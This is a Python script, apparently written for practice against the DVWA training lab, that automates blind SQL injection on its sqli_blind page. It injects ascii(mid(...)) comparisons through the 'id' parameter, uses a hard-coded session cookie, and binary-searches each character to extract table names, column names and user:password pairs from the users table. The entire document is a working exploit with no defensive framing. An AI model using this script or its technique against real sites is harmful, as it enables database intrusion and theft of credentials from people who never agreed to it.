import sys
import requests

def getpayload(n,index,ascii):
	star_str = "1' and "
	end_str = "--+&Submit=Submit#"
	#这句话该一下就可以实现半自动了
	#查有哪些表
	#sql_str = "ascii( mid((select table_name from information_schema.tables where table_schema=database() limit "+str(n)+",1),"+str(index)+",1))>"+str(ascii)
	#查指定表中的列
	#sql_str = "ascii( mid((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit "+str(n)+",1),"+str(index)+",1))>"+str(ascii)
	#查具体数据
	sql_str = "ascii( mid((select concat(user,':',password) from users limit "+str(n)+",1),"+str(index)+",1))>"+str(ascii)
	payload = star_str+sql_str+end_str
	return payload

def execute(n,index,ascii):
	url = "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id="
	cookie = {  'security':'low',
				'PHPSESSID':'5j8pk2pu0er93e90tnscev4i46',
				'acopendivids':'swingset,jotto,phpbb2,redmine',
				'acgroupswithpersist':'nada' }
	echo = "First name"
	payload = ""
	payload = getpayload(n,index,ascii)
	exec_url = url+payload
	#print(exec_url)
	r = requests.get(exec_url,cookies=cookie)
	if echo in r.text:
		return True
	else:
		return False

def dichotomy(n,index):
	#只查找可以显示的字符
	low = 30
	high = 126
	while low < high:
		ascii = int((low+high)/2)
		if execute(n,index,ascii):
			low = ascii
		else:
			high = ascii
		if low == high-1:
			if execute(n,index,low):
				ascii = high
			else:
				ascii = low
			break
	return ascii
			

if __name__ == "__main__":
	
	for i in range (10):
		count = 0
		name = ""
		for j in range(1,20):
			count += 1
			ascii =  dichotomy(i,j)
			#遇到不可显示字符就退出
			if ascii == 30:
				break
			name += chr(ascii)
			print(name)
		if count == 1:
			break